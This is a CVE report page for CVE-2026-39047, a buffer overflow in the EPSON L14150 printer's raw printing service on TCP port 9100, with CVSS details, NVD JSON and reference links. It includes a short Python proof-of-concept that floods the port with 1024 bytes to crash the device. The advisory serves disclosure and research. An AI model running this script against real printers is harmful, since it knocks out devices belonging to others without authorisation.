Security Vulnerability Report
中文
CVE-2026-39047 CVSS 7.5 HIGH

CVE-2026-39047

Published: 2026-05-20 16:16:26
Last Modified: 2026-05-20 17:31:45

Description

Buffer Overflow vulnerability in EPSON L14150 FL27PB allows a remote attacker to execute arbitrary code via the RAW Printing Service (JetDirect) on TCP port 9100

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

EPSON L14150 FL27PB

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import socket # Configuration target_host = '192.168.x.x' target_port = 9100 # Payload construction # Note: Offset and return address need to be adjusted based on specific firmware analysis buffer_size = 1024 # Example triggering size payload = b'A' * buffer_size try: print(f"[*] Connecting to {target_host}:{target_port}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(5) s.connect((target_host, target_port)) print("[*] Sending malicious payload...") s.send(payload) print("[+] Payload sent. Check device status.") s.close() except Exception as e: print(f"[-] Exploit failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-39047", "sourceIdentifier": "[email protected]", "published": "2026-05-20T16:16:25.630", "lastModified": "2026-05-20T17:31:45.303", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Buffer Overflow vulnerability in EPSON L14150 FL27PB allows a remote attacker to execute arbitrary code via the RAW Printing Service (JetDirect) on TCP port 9100"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://gist.github.com/AzhariRamadhan/1defc815542fb72e6025da2ce53a1046", "source": "[email protected]"}, {"url": "https://github.com/AzhariRamadhan/CVE-PORT-9100", "source": "[email protected]"}]}}